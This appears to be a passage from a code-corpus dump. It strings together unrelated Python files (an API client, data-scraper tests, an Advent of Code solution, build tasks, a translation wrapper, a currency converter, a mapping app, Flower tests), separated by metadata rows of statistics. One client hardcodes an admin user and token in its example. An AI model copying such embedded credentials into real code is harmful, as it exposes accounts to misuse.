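    "jobs_submitted": 10,              # int, required
    "tasks_submitted": 20,             # must equal jobs_submitted * tasks_per_job
    "tasks_per_job": 2,                # int, required
    "group": "users",                  # str, required
})
# POST /datasets with this body returns 201 and a Location header
# pointing at the new /datasets/<dataset_id>.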
| 34.978723
| 122
| 0.586603
| 1,512
| 13,152
| 4.973545
| 0.168651
| 0.05266
| 0.035904
| 0.057447
| 0.391489
| 0.353457
| 0.330452
| 0.307048
| 0.280452
| 0.253059
| 0
| 0.008925
| 0.284367
| 13,152
| 375
| 123
| 35.072
| 0.790055
| 0.061359
| 0
| 0.27193
| 0
| 0
| 0.18022
| 0.023221
| 0
| 0
| 0
| 0.005333
| 0
| 1
| 0.008772
| false
| 0
| 0.052632
| 0
| 0.100877
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e79f990859c3061f129402b3a92ec843ee5ea60
| 2,938
|
py
|
Python
|
backend/utils/n9e_api.py
|
itimor/one-ops
|
f1111735de252012752dfabe11598e9690c89257
|
[
"MIT"
] | null | null | null |
backend/utils/n9e_api.py
|
itimor/one-ops
|
f1111735de252012752dfabe11598e9690c89257
|
[
"MIT"
] | 6
|
2021-03-19T10:20:05.000Z
|
2021-09-22T19:30:21.000Z
|
backend/utils/n9e_api.py
|
itimor/one-ops
|
f1111735de252012752dfabe11598e9690c89257
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# author: itimor
import requests
import json
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
class FalconClient(object):
def __init__(self, endpoint=None, user=None, token=None, keys=[], session=None, ssl_verify=True):
self._endpoint = endpoint
self._job_prex = 'job/'
self._url_suffix = 'api/json'
self._keys = keys
self._session = session
self.ssl_verify = ssl_verify
if not session:
params = {
"name": user,
"password": token
}
self._session = requests.Session()
ret = self.do_request('get', '/', params=params)
print(ret)
api_token = {
"name": user,
"sig": ret.get("sig")
}
self._session.auth = (user, token)
self._session.headers.update({
'Content-Type': 'application/json; charset=utf-8',
'Accept': 'application/json',
'Apitoken': json.dumps(api_token)
})
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
return self.__class__(
endpoint=self._endpoint,
keys=self._keys + [key],
session=self._session,
ssl_verify=self.ssl_verify)
def __getitem__(self, key):
"""Look up an option value and perform string substitution."""
return self.__getattr__(key)
def __call__(self, **kwargs):
method = self._keys[-1]
url = "/".join(self._keys[0:-1])
url = url.replace("_", "-")
return self.do_request(method, url, **kwargs)
def do_request(self, method, url, params=None, data=None):
url = self._endpoint + url + self._url_suffix
if data:
print(data)
if params is None:
params = {}
if method == 'get' or method == 'list':
response = self._session.get(url, params=params, verify=self.ssl_verify)
if method == 'post' or method == 'create':
response = self._session.post(url, params=params, json=data, verify=self.ssl_verify)
if method == 'put' or method == 'update':
response = self._session.put(url, json=data, verify=self.ssl_verify)
if method == 'delete':
response = self._session.delete(url, params=params, json=data, verify=self.ssl_verify)
try:
body = json.loads(response.text)
except ValueError:
body = "Get unknow error is [%s]" % response.reason
return body
if __name__ == '__main__':
cli = FalconClient(endpoint="http://n9e.xxoo.com", user='admin', token='11871bd159bd19da9ab624d161c569e3c8')
params = {"idents": ["192.168.0.112"]}
r = cli.node['2'].endpoint_unbind.post(data=params)
print(r)
| 31.255319
| 112
| 0.566372
| 331
| 2,938
| 4.791541
| 0.335347
| 0.051072
| 0.04918
| 0.059899
| 0.0971
| 0.0971
| 0.080076
| 0.080076
| 0.052963
| 0
| 0
| 0.019118
| 0.30565
| 2,938
| 93
| 113
| 31.591398
| 0.758333
| 0.031995
| 0
| 0.056338
| 0
| 0
| 0.090236
| 0.011984
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070423
| false
| 0.014085
| 0.070423
| 0
| 0.225352
| 0.042254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e7ab87b888bbbe2383cfa6903a948e5d52465e7
| 9,035
|
py
|
Python
|
tests/test_mapexplorer.py
|
OCHA-DAP/hdx-scraper-mapexplorer
|
3fef67376815611657657c6d53ce904b8f9e4550
|
[
"MIT"
] | null | null | null |
tests/test_mapexplorer.py
|
OCHA-DAP/hdx-scraper-mapexplorer
|
3fef67376815611657657c6d53ce904b8f9e4550
|
[
"MIT"
] | null | null | null |
tests/test_mapexplorer.py
|
OCHA-DAP/hdx-scraper-mapexplorer
|
3fef67376815611657657c6d53ce904b8f9e4550
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Unit tests for scrapername.
'''
import difflib
import filecmp
from datetime import datetime
from os.path import join
from tempfile import gettempdir
import pytest
from hdx.hdx_configuration import Configuration
import hdx.utilities.downloader
from hdx.utilities.compare import assert_files_same
from hdx.utilities.loader import load_json
from src.acled import update_lc_acled, update_ssd_acled
from mapexplorer import get_valid_names
from src.cbpf import update_cbpf
from src.fts import update_fts
#from src.rowca import update_rowca
class TestScraperName:
@pytest.fixture(scope='class')
def configuration(self):
Configuration._create(user_agent='test', hdx_read_only=True,
project_config_yaml=join('tests', 'config', 'project_configuration.yml'))
@pytest.fixture(scope='class')
def folder(self, configuration):
return gettempdir()
@pytest.fixture(scope='class')
def downloader(self):
return hdx.utilities.downloader.Download()
@pytest.fixture(scope='class')
def today(self):
return datetime.strptime('2018-01-16', '%Y-%m-%d')
@pytest.fixture(scope='class')
def lc_country_list(self, configuration):
return ['Nigeria']
@pytest.fixture(scope='class')
def ssd_country_list(self, configuration):
return ['South Sudan']
@pytest.fixture(scope='class')
def valid_lc_names(self, downloader):
lc_names_url = Configuration.read()['lc_names_url']
return get_valid_names(downloader, lc_names_url, headers=['ISO', 'Name'])
@pytest.fixture(scope='class')
def replace_lc_values(self, downloader):
lc_mappings_url = Configuration.read()['lc_mappings_url']
return downloader.download_tabular_key_value(lc_mappings_url)
@pytest.fixture(scope='class')
def valid_ssd_adm1_names(self, downloader):
ssd_adm1_names_url = Configuration.read()['ssd_adm1_names_url']
return get_valid_names(downloader, ssd_adm1_names_url, headers=['Name'])
@pytest.fixture(scope='class')
def valid_ssd_adm2_names(self, downloader):
ssd_adm2_names_url = Configuration.read()['ssd_adm2_names_url']
return get_valid_names(downloader, ssd_adm2_names_url, headers=['Name'])
@pytest.fixture(scope='class')
def replace_ssd_values(self, downloader):
ssd_mappings_url = Configuration.read()['ssd_mappings_url']
return downloader.download_tabular_key_value(ssd_mappings_url)
@pytest.fixture(scope='function')
def downloaderfts(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://lala/plan/country/NGA':
def fn():
return load_json(join('tests', 'fixtures', 'FTS_plan_NGA.json'))
response.json = fn
elif url == 'http://lala/fts/flow?groupby=plan&countryISO3=NGA':
def fn():
return load_json(join('tests', 'fixtures', 'FTS_flow_NGA.json'))
response.json = fn
return response
return Download()
@pytest.fixture(scope='function')
def downloaderrowca(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://haha/country=3,4,8,9&subcat=4&inclids=yes&final=1&format=json&lng=en':
def fn():
return load_json(join('tests', 'fixtures', 'ROWCA_population.json'))
response.json = fn
elif url == 'http://haha/country=3,4,8,9&subcat=9,10&inclids=yes&final=1&format=json&lng=en':
def fn():
return load_json(join('tests', 'fixtures', 'ROWCA_movement.json'))
response.json = fn
return response
return Download()
@pytest.fixture(scope='function')
def downloadercbpf(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://mama/ProjectSummary?poolfundAbbrv=SSD19':
def fn():
return load_json(join('tests', 'fixtures', 'CBPF_ProjectSummary_SSD.json'))
response.json = fn
elif url == 'http://mama/Location?poolfundAbbrv=SSD19':
def fn():
return load_json(join('tests', 'fixtures', 'CBPF_Location_SSD.json'))
response.json = fn
return response
return Download()
def test_lc_acled(self, folder, today, lc_country_list, valid_lc_names, replace_lc_values):
resource_updates = dict()
filename = 'Lake_Chad_Basin_Recent_Conflict_Events.csv'
expected_events = join('tests', 'fixtures', filename)
actual_events = join(folder, filename)
resource_updates['acled_events'] = {'path': actual_events}
filename = 'Lake_Chad_Basin_Recent_Conflict_Event_Total_Fatalities.csv'
expected_fatalities = join('tests', 'fixtures', filename)
actual_fatalities = join(folder, filename)
resource_updates['acled_fatalities'] = {'path': actual_fatalities}
update_lc_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDNigeria.csv?', lc_country_list, valid_lc_names, replace_lc_values, resource_updates)
assert_files_same(expected_events, actual_events)
assert_files_same(expected_fatalities, actual_fatalities)
def test_ssd_acled(self, folder, today, ssd_country_list, valid_ssd_adm2_names, replace_ssd_values):
resource_updates = dict()
filename = 'South_Sudan_Recent_Conflict_Events.csv'
expected_events = join('tests', 'fixtures', filename)
actual_events = join(folder, filename)
resource_updates['acled_events'] = {'path': actual_events}
filename = 'South_Sudan_Recent_Conflict_Event_Total_Fatalities.csv'
expected_fatalities = join('tests', 'fixtures', filename)
actual_fatalities = join(folder, filename)
resource_updates['acled_fatalities'] = {'path': actual_fatalities}
update_ssd_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDSouthSudan.csv?', ssd_country_list, valid_ssd_adm2_names, replace_ssd_values, resource_updates)
assert_files_same(expected_events, actual_events)
assert_files_same(expected_fatalities, actual_fatalities)
def test_fts(self, folder, downloaderfts, lc_country_list):
resource_updates = dict()
filename = 'Lake_Chad_Basin_Appeal_Status.csv'
expected = join('tests', 'fixtures', filename)
actual = join(folder, filename)
resource_updates['fts'] = {'path': actual}
update_fts('http://lala/', downloaderfts, lc_country_list, resource_updates)
assert_files_same(expected, actual)
def test_cbpf(self, folder, today, downloadercbpf, valid_ssd_adm1_names, replace_ssd_values):
resource_updates = dict()
filename = 'South_Sudan_Country_Based_Pool_Funds.csv'
expected = join('tests', 'fixtures', filename)
actual = join(folder, filename)
resource_updates['cbpf'] = {'path': actual}
update_cbpf('http://mama/', downloadercbpf, 'SSD19', today, valid_ssd_adm1_names, replace_ssd_values, resource_updates)
assert_files_same(expected, actual)
# def test_rowca(self, folder, downloaderrowca, valid_lc_names, replace_lc_values):
# resource_updates = dict()
# filename = 'Lake_Chad_Basin_Estimated_Population.csv'
# expected_population = join('tests', 'fixtures', filename)
# actual_population = join(folder, filename)
# resource_updates['rowca_population'] = {'path': actual_population}
# filename = 'Lake_Chad_Basin_Displaced.csv'
# expected_displaced = join('tests', 'fixtures', filename)
# actual_displaced = join(folder, filename)
# resource_updates['rowca_displaced'] = {'path': actual_displaced}
# update_rowca('http://haha/', downloaderrowca, valid_lc_names, replace_lc_values, resource_updates)
# assert filecmp.cmp(expected_population, actual_population, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_population, actual_population)
# assert filecmp.cmp(expected_displaced, actual_displaced, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_displaced, actual_displaced)
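The active tests above call an assert_files_same helper that is imported elsewhere in this module and not shown here. A minimal sketch of such a helper, modeled on the filecmp-based asserts in the commented-out test_rowca and assuming a byte-for-byte comparison is intended:

import filecmp

def assert_files_same(expected, actual):
    # Compare file contents, not just os.stat() metadata (shallow=False).
    assert filecmp.cmp(expected, actual, shallow=False), \
        'Expected: %s and Actual: %s do not match!' % (expected, actual)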
| 44.727723
| 220
| 0.657554
| 1,017
| 9,035
| 5.576205
| 0.165192
| 0.047611
| 0.044437
| 0.044613
| 0.691589
| 0.611003
| 0.580674
| 0.537824
| 0.497972
| 0.44419
| 0
| 0.00607
| 0.2342
| 9,035
| 201
| 221
| 44.950249
| 0.813557
| 0.123962
| 0
| 0.525641
| 0
| 0.025641
| 0.182106
| 0.045748
| 0
| 0
| 0
| 0
| 0.044872
| 1
| 0.192308
| false
| 0.019231
| 0.089744
| 0.070513
| 0.467949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e81b7168137c8ead27ea61e73b96364b565fc1e
| 708
|
py
|
Python
|
2016/day_06.py
|
nabiirah/advent-of-code
|
9c7e7cae437c024aa05d9cb7f9211fd47f5226a2
|
[
"MIT"
] | 24
|
2020-12-08T20:07:52.000Z
|
2022-01-18T20:08:06.000Z
|
2016/day_06.py
|
nestorhf/advent-of-code
|
1bb827e9ea85e03e0720e339d10b3ed8c44d8f27
|
[
"MIT"
] | null | null | null |
2016/day_06.py
|
nestorhf/advent-of-code
|
1bb827e9ea85e03e0720e339d10b3ed8c44d8f27
|
[
"MIT"
] | 10
|
2020-12-04T10:04:15.000Z
|
2022-02-21T22:22:26.000Z
|
""" Advent of Code Day 6 - Signals and Noise"""
with open('inputs/day_06.txt', 'r') as f:
rows = [row.strip() for row in f.readlines()]
flipped = zip(*rows)
message = ''
mod_message = ''
for chars in flipped:
most_freq = ''
least_freq = ''
highest = 0
lowest = 100
for char in chars:
if chars.count(char) > highest:
highest = chars.count(char)
most_freq = char
if chars.count(char) < lowest: # Part Two
lowest = chars.count(char)
least_freq = char
message += most_freq
mod_message += least_freq
# Answer One
print("Error Corrected Message:", message)
# Answer Two
print("Modified Message:", mod_message)
| 22.83871
| 51
| 0.601695
| 94
| 708
| 4.425532
| 0.478723
| 0.096154
| 0.134615
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.278249
| 708
| 30
| 52
| 23.6
| 0.800391
| 0.101695
| 0
| 0
| 0
| 0
| 0.094099
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.095238
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e83689fcdf6c1f0b2f2c351aa1c6fe2dad28771
| 1,846
|
py
|
Python
|
tasks.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 6
|
2017-10-31T20:54:37.000Z
|
2020-10-23T19:03:00.000Z
|
tasks.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 7
|
2020-03-24T16:14:34.000Z
|
2021-03-18T20:51:37.000Z
|
tasks.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 1
|
2019-07-29T07:55:49.000Z
|
2019-07-29T07:55:49.000Z
|
import hashlib
import json
import os
import pathlib
import shlex
import nbformat
from invoke import task
files_to_format = ["chmp/src", "tasks.py", "chmp/setup.py"]
inventories = [
"http://daft-pgm.org",
"https://matplotlib.org",
"http://www.numpy.org",
"https://pandas.pydata.org",
"https://docs.python.org/3",
"https://pytorch.org/docs/stable",
]
directories_to_test = ["chmp", "20170813-KeywordDetection/chmp-app-kwdetect"]
@task
def precommit(c):
format(c)
docs(c)
test(c)
@task
def test(c):
run(c, "pytest", *directories_to_test)
@task
def docs(c):
run(
c,
*["python", "-m", "chmp.tools", "mddocs"],
*(part for inventory in inventories for part in ["--inventory", inventory]),
*["chmp/docs/src", "chmp/docs"],
)
self_path = pathlib.Path(__file__).parent.resolve()
for p in self_path.glob("*/Post.ipynb"):
run(
c,
*["python", "-m", "chmp.tools", "blog"],
*[str(p), str(p.with_suffix(".md"))],
)
@task
def format(c):
run(c, "black", *files_to_format)
@task
def release(c, yes=False):
import packaging.version
with c.cd("chmp"):
run(c, "python", "setup.py", "bdist_wheel")
latest_package = max(
(
package
for package in os.listdir("chmp/dist")
if not package.startswith(".") and package.endswith(".whl")
),
key=packaging.version.parse,
)
if not yes:
answer = input(f"upload {latest_package} [yN] ")
if answer != "y":
print("stop")
return
with c.cd("chmp/dist"):
run(c, "twine", "upload", latest_package)
def run(c, *args, **kwargs):
args = [shlex.quote(arg) for arg in args]
args = " ".join(args)
return c.run(args, **kwargs)
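The run() helper above shell-quotes every argument before handing the joined string to invoke, so arguments containing spaces or shell metacharacters survive intact; a quick illustration with a made-up wheel name:

import shlex

args = ['twine', 'upload', 'dist/my package-0.1-py3-none-any.whl']
print(' '.join(shlex.quote(arg) for arg in args))
# twine upload 'dist/my package-0.1-py3-none-any.whl'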
| 20.511111
| 84
| 0.566089
| 237
| 1,846
| 4.329114
| 0.434599
| 0.02729
| 0.01462
| 0.021443
| 0.038986
| 0.038986
| 0
| 0
| 0
| 0
| 0
| 0.006574
| 0.258397
| 1,846
| 89
| 85
| 20.741573
| 0.742878
| 0
| 0
| 0.134328
| 0
| 0
| 0.228061
| 0.023294
| 0
| 0
| 0
| 0
| 0
| 1
| 0.089552
| false
| 0
| 0.119403
| 0
| 0.238806
| 0.014925
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e83cc92299ecc7a687b5a70cfeda857351d4ef2
| 1,016
|
py
|
Python
|
WeChat/translation.py
|
satoukiCk/SummerRobot
|
a22b17fb1927dcc1aa7316e2b892f7daee484583
|
[
"MIT"
] | null | null | null |
WeChat/translation.py
|
satoukiCk/SummerRobot
|
a22b17fb1927dcc1aa7316e2b892f7daee484583
|
[
"MIT"
] | null | null | null |
WeChat/translation.py
|
satoukiCk/SummerRobot
|
a22b17fb1927dcc1aa7316e2b892f7daee484583
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
import requests
import json
import random
import hashlib
KEY = ''
APPID = ''
API = 'http://api.fanyi.baidu.com/api/trans/vip/translate'
class translation():
def __init__(self,src, fromlang, tolang):
self.src = src
self.fromlang = fromlang
self.tolang = tolang
def trans(self):
salt = random.randint(32768,65535)
sign = APPID+self.src+str(salt)+KEY
        m1 = hashlib.md5()
        m1.update(sign.encode('utf-8'))  # hashlib requires bytes, not str
        sign = m1.hexdigest()
paras = {
'q':self.src,
'from':self.fromlang,
'to':self.tolang,
'appid':APPID,
'salt':salt,
'sign':sign
}
result = requests.get(API,params=paras,timeout=50)
tdata = json.loads(result.text)
        res_msg = ''
        src = tdata['trans_result'][0]['src']
        dst = tdata['trans_result'][0]['dst']
        res_msg += 'Source language: %s\nTranslation result: %s' % (src, dst)
return res_msg
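The Baidu translate API authenticates each request with sign = md5(appid + query + salt + key), which is exactly what trans() computes above; the signing step in isolation, with placeholder credentials:

import hashlib
import random

appid, key, query = 'dummy-appid', 'dummy-key', 'hello'  # placeholders, not real credentials
salt = str(random.randint(32768, 65535))
sign = hashlib.md5((appid + query + salt + key).encode('utf-8')).hexdigest()
print(salt, sign)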
| 25.4
| 81
| 0.541339
| 122
| 1,016
| 4.434426
| 0.47541
| 0.051756
| 0.05915
| 0.062847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029619
| 0.302165
| 1,016
| 39
| 82
| 26.051282
| 0.733427
| 0.019685
| 0
| 0
| 0
| 0
| 0.125755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.121212
| 0
| 0.242424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e864e061007124f810efb595fdd8cc9331ec714
| 2,040
|
py
|
Python
|
kicost/currency_converter/currency_converter.py
|
mdeweerd/KiCost
|
2f67dad0f8d3335590835a6790181fc6428086d5
|
[
"MIT"
] | null | null | null |
kicost/currency_converter/currency_converter.py
|
mdeweerd/KiCost
|
2f67dad0f8d3335590835a6790181fc6428086d5
|
[
"MIT"
] | null | null | null |
kicost/currency_converter/currency_converter.py
|
mdeweerd/KiCost
|
2f67dad0f8d3335590835a6790181fc6428086d5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2021 Salvador E. Tropea
# Copyright (c) 2021 Instituto Nacional de Tecnología Industrial
# License: Apache 2.0
# Project: KiCost
# Adapted from: https://github.com/alexprengere/currencyconverter
"""
CurrencyConverter:
This is a reduced version of the 'Currency Converter' by Alex Prengère.
Original project: https://github.com/alexprengere/currencyconverter
This version only supports conversions at the latest exchange rates, not
historic ones.
On the other hand, this version always tries to fetch the latest rates.
"""
try:
from .default_rates import default_rates, default_date
except ImportError:
    # Only useful to bootstrap
default_rates = {}
default_date = ''
from .download_rates import download_rates
# Author information.
__author__ = 'Salvador Eduardo Tropea'
__webpage__ = 'https://github.com/set-soft/'
__company__ = 'INTI-CMNB - Argentina'
class CurrencyConverter(object):
def __init__(self):
self.initialized = False
def _do_init(self):
if self.initialized:
return
self.date, self.rates = download_rates()
if not self.date:
self.date = default_date
self.rates = default_rates
self.initialized = True
def convert(self, amount, currency, new_currency='EUR'):
"""Convert amount from a currency to another one.
:param float amount: The amount of `currency` to convert.
:param str currency: The currency to convert from.
:param str new_currency: The currency to convert to.
:return: The value of `amount` in `new_currency`.
:rtype: float
>>> c = CurrencyConverter()
>>> c.convert(100, 'EUR', 'USD')
"""
self._do_init()
for c in currency, new_currency:
if c not in self.rates:
raise ValueError('{0} is not a supported currency'.format(c))
r0 = self.rates[currency]
r1 = self.rates[new_currency]
return float(amount) / r0 * r1
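Because all rates are stored against a single base currency (EUR here, per the default new_currency), convert() goes through the base: amount / rate[currency] * rate[new_currency]. A worked example with made-up rates:

rates = {'EUR': 1.0, 'USD': 1.1, 'GBP': 0.85}  # hypothetical rates, EUR base
amount = 100                                    # 100 USD
in_eur = amount / rates['USD']                  # ~90.91 EUR
in_gbp = in_eur * rates['GBP']                  # ~77.27 GBP
print(round(in_gbp, 2))                         # 77.27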
| 30.447761
| 77
| 0.666667
| 255
| 2,040
| 5.196078
| 0.431373
| 0.033962
| 0.031698
| 0.039245
| 0.10717
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012862
| 0.237745
| 2,040
| 66
| 78
| 30.909091
| 0.839228
| 0.457843
| 0
| 0
| 0
| 0
| 0.103922
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.107143
| 0
| 0.321429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e893aecc42c83f372f87792977e579561f4f1e5
| 385
|
py
|
Python
|
apps/vector.py
|
HayesAJ83/LeafMapAppTest
|
5da65d5c1958f47934453124a72ec800c0ce6a93
|
[
"MIT"
] | 22
|
2021-08-10T05:11:47.000Z
|
2022-02-27T14:35:30.000Z
|
apps/vector.py
|
HayesAJ83/LeafMapAppTest
|
5da65d5c1958f47934453124a72ec800c0ce6a93
|
[
"MIT"
] | null | null | null |
apps/vector.py
|
HayesAJ83/LeafMapAppTest
|
5da65d5c1958f47934453124a72ec800c0ce6a93
|
[
"MIT"
] | 8
|
2021-10-04T13:10:32.000Z
|
2021-11-17T12:32:57.000Z
|
import streamlit as st
import leafmap
def app():
st.title("Add vector datasets")
url = "https://raw.githubusercontent.com/giswqs/data/main/world/world_cities.csv"
in_csv = st.text_input("Enter a URL to a vector file", url)
m = leafmap.Map()
if in_csv:
m.add_xy_data(in_csv, x="longitude", y="latitude", layer_name="World Cities")
m.to_streamlit()
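add_xy_data expects a table whose column names match the x/y arguments passed above; a quick check of the same CSV outside Streamlit, assuming pandas is available:

import pandas as pd

url = 'https://raw.githubusercontent.com/giswqs/data/main/world/world_cities.csv'
df = pd.read_csv(url)
print(df[['longitude', 'latitude']].head())  # the columns consumed by add_xy_data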
| 22.647059
| 85
| 0.675325
| 61
| 385
| 4.114754
| 0.639344
| 0.059761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18961
| 385
| 16
| 86
| 24.0625
| 0.804487
| 0
| 0
| 0
| 0
| 0
| 0.387013
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e90e63aeba9851ed0445a458eb6eb560cabb51f
| 5,684
|
py
|
Python
|
tests/unit/test_command.py
|
shintaii/flower
|
fdeb135ddb3718404c0f1e9cca73fc45181f611a
|
[
"BSD-3-Clause"
] | 4,474
|
2015-01-01T18:34:36.000Z
|
2022-03-29T06:02:38.000Z
|
tests/unit/test_command.py
|
shintaii/flower
|
fdeb135ddb3718404c0f1e9cca73fc45181f611a
|
[
"BSD-3-Clause"
] | 835
|
2015-01-06T21:29:48.000Z
|
2022-03-31T04:35:10.000Z
|
tests/unit/test_command.py
|
shintaii/flower
|
fdeb135ddb3718404c0f1e9cca73fc45181f611a
|
[
"BSD-3-Clause"
] | 980
|
2015-01-02T21:41:28.000Z
|
2022-03-31T08:30:52.000Z
|
import os
import sys
import tempfile
import unittest
import subprocess
from unittest.mock import Mock, patch
import mock
from prometheus_client import Histogram
from flower.command import apply_options, warn_about_celery_args_used_in_flower_command, apply_env_options
from tornado.options import options
from tests.unit import AsyncHTTPTestCase
class TestFlowerCommand(AsyncHTTPTestCase):
def test_task_runtime_metric_buckets_read_from_cmd_line(self):
apply_options('flower', argv=['--task_runtime_metric_buckets=1,10,inf'])
self.assertEqual([1.0, 10.0, float('inf')], options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_no_cmd_line_arg(self):
apply_options('flower', argv=[])
self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_read_from_env(self):
os.environ["FLOWER_TASK_RUNTIME_METRIC_BUCKETS"] = "2,5,inf"
apply_env_options()
self.assertEqual([2.0, 5.0, float('inf')], options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_no_env_value_provided(self):
apply_env_options()
self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)
def test_port(self):
with self.mock_option('port', 5555):
apply_options('flower', argv=['--port=123'])
self.assertEqual(123, options.port)
def test_address(self):
with self.mock_option('address', '127.0.0.1'):
apply_options('flower', argv=['--address=foo'])
self.assertEqual('foo', options.address)
def test_autodiscovery(self):
"""
Simulate basic Django setup:
- creating celery app
- run app.autodiscover_tasks()
- create flower command
"""
celery_app = self._get_celery_app()
with mock.patch.object(celery_app, '_autodiscover_tasks') as autodiscover:
celery_app.autodiscover_tasks()
self.get_app(capp=celery_app)
self.assertTrue(autodiscover.called)
class TestWarnAboutCeleryArgsUsedInFlowerCommand(AsyncHTTPTestCase):
@patch('flower.command.logger.warning')
def test_does_not_log_warning(self, mock_warning):
mock_app_param = Mock(name='app_param', opts=('-A', '--app'))
mock_broker_param = Mock(name='broker_param', opts=('-b', '--broker'))
class FakeContext:
parent = Mock(command=Mock(params=[mock_app_param, mock_broker_param]))
ctx = FakeContext()
warn_about_celery_args_used_in_flower_command(
ctx=ctx, flower_args=('--port=5678', '--address=0.0.0.0')
)
mock_warning.assert_not_called()
@patch('flower.command.logger.warning')
def test_logs_warning(self, mock_warning):
mock_app_param = Mock(name='app_param', opts=('-A', '--app'))
mock_broker_param = Mock(name='broker_param', opts=('-b', '--broker'))
class FakeContext:
parent = Mock(command=Mock(params=[mock_app_param, mock_broker_param]))
ctx = FakeContext()
warn_about_celery_args_used_in_flower_command(
ctx=ctx, flower_args=('--app=proj', '-b', 'redis://localhost:6379/0')
)
mock_warning.assert_called_once_with(
"You have incorrectly specified the following celery arguments after flower command: "
"[\'--app\', \'-b\']. Please specify them after celery command instead following"
" this template: celery [celery args] flower [flower args]."
)
class TestConfOption(AsyncHTTPTestCase):
def test_error_conf(self):
with self.mock_option('conf', None):
self.assertRaises(IOError, apply_options,
'flower', argv=['--conf=foo'])
self.assertRaises(IOError, apply_options,
'flower', argv=['--conf=/tmp/flower/foo'])
def test_default_option(self):
apply_options('flower', argv=[])
self.assertEqual('flowerconfig.py', options.conf)
def test_empty_conf(self):
with self.mock_option('conf', None):
apply_options('flower', argv=['--conf=/dev/null'])
self.assertEqual('/dev/null', options.conf)
def test_conf_abs(self):
